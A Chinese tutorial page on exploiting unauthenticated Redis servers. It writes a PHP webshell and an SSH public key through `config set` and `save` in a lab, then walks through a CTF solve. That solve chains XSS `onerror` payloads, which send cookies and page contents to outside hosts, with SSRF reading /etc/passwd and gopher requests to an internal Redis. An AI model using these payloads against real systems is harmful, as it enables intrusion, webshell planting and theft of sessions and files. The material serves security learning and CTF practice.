redis未授權(quán)訪問的方法

這篇文章主要為大家詳細(xì)介紹了redis未授權(quán)訪問的方法,圖文詳解容易學(xué)習(xí),配合代碼閱讀理解效果更佳,非常適合初學(xué)者入門,感興趣的小伙伴們可以參考一下。

站在用戶的角度思考問題,與客戶深入溝通,找到海林網(wǎng)站設(shè)計(jì)與海林網(wǎng)站推廣的解決方案,憑借多年的經(jīng)驗(yàn),讓設(shè)計(jì)與互聯(lián)網(wǎng)技術(shù)結(jié)合,創(chuàng)造個(gè)性化、用戶體驗(yàn)好的作品,建站類型包括:成都網(wǎng)站建設(shè)、做網(wǎng)站、企業(yè)官網(wǎng)、英文網(wǎng)站、手機(jī)端網(wǎng)站、網(wǎng)站推廣、域名注冊(cè)、虛擬空間、企業(yè)郵箱。業(yè)務(wù)覆蓋海林地區(qū)。

redis是一種以key-value為鍵值對(duì)的非關(guān)系型數(shù)據(jù)庫。

redis是一個(gè)開源的使用ANSI C語言編寫、遵守BSD協(xié)議、支持網(wǎng)絡(luò)、可基于內(nèi)存亦可持久化的日志型、Key-Value數(shù)據(jù)庫,并提供多種語言的API。

它通常被稱為數(shù)據(jù)結(jié)構(gòu)服務(wù)器,因?yàn)橹担╲alue)可以是 字符串(String), 哈希(Map), 列表(list), 集合(sets) 和 有序集合(sorted sets)等類型。

安裝服務(wù)

win

下載地址:https://github.com/MSOpenTech/redis/releases
測試環(huán)境:

操作系統(tǒng):win7
ip:192.168.107.144

redis未授權(quán)訪問的方法

命令行輸入

redis-server.exe redis.conf

redis未授權(quán)訪問的方法

接著查看端口

redis未授權(quán)訪問的方法

6379端口(redis默認(rèn)端口)已經(jīng)打開

redis成功啟動(dòng)

ubuntu

安裝

sudo apt-get update
sudo apt-get install redis-server

啟動(dòng)服務(wù)

redis-server

基本命令

連接redis

redis-cli.exe -h 192.168.107.144

查看鍵為x的值

redis 192.168.107.144:6379> get x
"<?php phpinfo(); ?>"

get所有key

redis 192.168.107.144:6379> keys *
1) "x"

刪除所有鍵

redis 192.168.107.144:6379>flushall

漏洞利用

本機(jī)通過telnet命令主動(dòng)去連接目標(biāo)機(jī)

redis未授權(quán)訪問的方法

或者通過redis-cli.exe -h 192.168.107.144連接

redis未授權(quán)訪問的方法

連接成功

輸入info獲取相關(guān)信息

可以看到redis版本號(hào)等

redis未授權(quán)訪問的方法

利用方式

  • 寫入一句話webshell

  • 寫入ssh公鑰

寫入shell

redis未授權(quán)訪問的方法

//設(shè)置x的值
redis 192.168.107.144:6379> set x "<?php phpinfo(); ?>"  

redis 192.168.107.144:6379> config set dbfilename test.php

redis 192.168.107.144:6379> config set dir D:/WWW/PHPTutorial/WWW

redis 192.168.107.144:6379> save

成功寫入目標(biāo)機(jī)

redis未授權(quán)訪問的方法

寫入ssh公鑰

在本地生成一對(duì)密鑰

root@ip-172-31-14-115:~/.ssh# ssh-keygen -t rsa

redis未授權(quán)訪問的方法

接著將ssh公鑰寫入靶機(jī)

root@ip-172-31-14-115:/etc/redis# redis-cli -h 192.168.107.144
192.168.107.144:6379> config set dir /root/.ssh                   # 設(shè)置本地存儲(chǔ)文件目錄
192.168.107.144:6379> config set dbfilename pub_keys        # 設(shè)置本地存儲(chǔ)文件名

192.168.107.144:6379> set x "xxxx"  # 將你的ssh公鑰寫入x鍵里。(xxxx即你自己生成的ssh公鑰)

192.168.107.144:6379> save     # 保存

再到本地去連接ssh

root@ip-172-31-14-115:~/.ssh# ssh -i id_rsa root@192.168.107.144

即可

CTF中的redis(XSS->SSRF&Gopher->Redis)

題目為

redis未授權(quán)訪問的方法

題目地址:https://hackme.inndy.tw/scoreboard/

xeeme

泄露

redis未授權(quán)訪問的方法

在robots.txt發(fā)現(xiàn)泄露源碼

是加密了的config.php

redis未授權(quán)訪問的方法

xss打cookie

注冊(cè)登陸后的界面

redis未授權(quán)訪問的方法

發(fā)郵件有驗(yàn)證

redis未授權(quán)訪問的方法

驗(yàn)證寫個(gè)腳本即可

<?php
    $captcha=1;
    while(1) {
    if(substr(md5("60df5eaed35edcf0".$captcha),0,5) === "00000")
        {
            echo $captcha;
            break;
        }
        $captcha++;
}
echo "<br>".md5($captcha);
?>

然后過濾了一些東西

redis未授權(quán)訪問的方法

用img測試

redis未授權(quán)訪問的方法

onload也過濾了

redis未授權(quán)訪問的方法

這里注意到一個(gè)細(xì)節(jié),過濾的是空格加上onerror,猜想是匹配到有空格的onerror才會(huì)過濾,于是構(gòu)造沒有空格的onerror,嘗試payload

<img src=""onerror="document.location='http://vps/?a='+document.cookie">

然后打cookie,成功打到cookie

redis未授權(quán)訪問的方法

將SESSION解碼

PHPSESSID=rmibdo13ohquscgsuphitr9cp4; FLAG_XSSME=FLAG{Sometimes, XSS can be critical vulnerability <script>alert(1)</script>}; FLAG_2=IN_THE_REDIS

xssrf leak

根據(jù)上一題的cookie,FLAG_2=IN_THE_REDIS

還是一樣的環(huán)境

因?yàn)槟玫搅斯芾韱T的cookie,于是登陸一下

redis未授權(quán)訪問的方法

需要本地登陸,嘗試一下偽造xff頭

換了幾個(gè)ip頭都沒用

于是想到之前做的題,可以直接去打管理員頁面的源碼

這里 不知道為什么 xss平臺(tái)接收不到,于是換了一個(gè)平臺(tái)

利用payload

<img src=""onerror="document.location='http://rkao6p.ceye.io/?'+btoa(document.body.innerHTML)">

redis未授權(quán)訪問的方法

發(fā)現(xiàn)innerhtml被過濾

于是html編碼

<img src=""onerror="document.location='http://rkao6p.ceye.io/?'+btoa(document.body.innerHTML)">

發(fā)現(xiàn)收到請(qǐng)求

redis未授權(quán)訪問的方法

解個(gè)碼,放在本地

redis未授權(quán)訪問的方法

SSRF讀取config.php

猜測send request功能存在ssrf

<img src=""onerror="
xmlhttp=new XMLHttpRequest();
xmlhttp.onreadystatechange=function()
{
if (xmlhttp.readyState==4 && xmlhttp.status==200)
{
    document.location='http://vps?'+btoa(xmlhttp.responseText)
}
}
xmlhttp.open("GET","request.php",true);
xmlhttp.send();
">

vps收到請(qǐng)求

redis未授權(quán)訪問的方法

解碼:

...


      <form action="/request.php" method="POST">
        <div class="form-group">
          <label for="url">URL</label>
          <textarea name="url" class="form-control" id="url" aria-describedby="url" placeholder="URL" rows="10"></textarea>
        </div>

        <button class="btn btn-primary">Send Request</button>
      </form>
    </div>
  </body>
</html>

post請(qǐng)求的url參數(shù)

嘗試讀文件

<img src=""onerror="
xmlhttp=new XMLHttpRequest();
xmlhttp.onreadystatechange=function()
{
if (xmlhttp.readyState==4 && xmlhttp.status==200)
{
    document.location='http://52.36.15.23:12345?'+btoa(xmlhttp.responseText)
}
}
xmlhttp.open("POST","request.php",true);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("url=file:///etc/passwd");
">

成功讀到/etc/passwd

redis未授權(quán)訪問的方法

于是讀之前的config.php

redis未授權(quán)訪問的方法

xssrf redis(ssrf+gopher拿下flag)

根據(jù)flag的提示,redis的端口是25566
請(qǐng)求redis配合gopher

<img src=""onerror="
xmlhttp=new XMLHttpRequest();
xmlhttp.onreadystatechange=function()
{
if (xmlhttp.readyState==4 && xmlhttp.status==200)
{
    document.location='http://52.36.15.23:12345?'+btoa(xmlhttp.responseText)
}
}
xmlhttp.open("POST","request.php",true);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("url=gopher://127.0.0.1:25566/_info");
">

redis未授權(quán)訪問的方法

成功獲取info

查看一下keys

xmlhttp.send("url=gopher://127.0.0.1:25566/_key%2520*");

redis未授權(quán)訪問的方法

去讀

既然有flag鍵,那么直接去讀flag的值

xmlhttp.send("url=gopher://127.0.0.1:25566/_get%2520flag");

redis未授權(quán)訪問的方法

類型不符合

于是查看類型

xmlhttp.send("url=gopher://127.0.0.1:25566/_type%2520flag");

redis未授權(quán)訪問的方法

是list,返回列表長度

xmlhttp.send("url=gopher://127.0.0.1:25566/_LLEN%2520flag");

redis未授權(quán)訪問的方法

那么獲取所有元素

xmlhttp.send("url=gopher://127.0.0.1:25566/_LRANGE%2520flag%25200%252053");

redis未授權(quán)訪問的方法

于是寫個(gè)腳本

flag="""
}
t
i
o
l
p
x
e

o
t

y
s
a
e

s
i

n
o
i
t
a
c
i
t
n
e
h
t
u
a

t
u
o
h
t
i
w

s
i
d
e
R
{
G
A
L
F
"""
result = flag[::-1]
print(result)

最后flag FLAG{Redis without authentication is easy to exploit}

關(guān)于redis未授權(quán)訪問的方法就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,可以學(xué)到更多知識(shí)。如果喜歡這篇文章,不如把它分享出去讓更多的人看到。

網(wǎng)站題目:redis未授權(quán)訪問的方法
標(biāo)題路徑:http://bm7419.com/article16/pcodgg.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供小程序開發(fā)網(wǎng)頁設(shè)計(jì)公司、靜態(tài)網(wǎng)站自適應(yīng)網(wǎng)站、商城網(wǎng)站、品牌網(wǎng)站建設(shè)

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場,如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來源: 創(chuàng)新互聯(lián)

網(wǎng)站優(yōu)化排名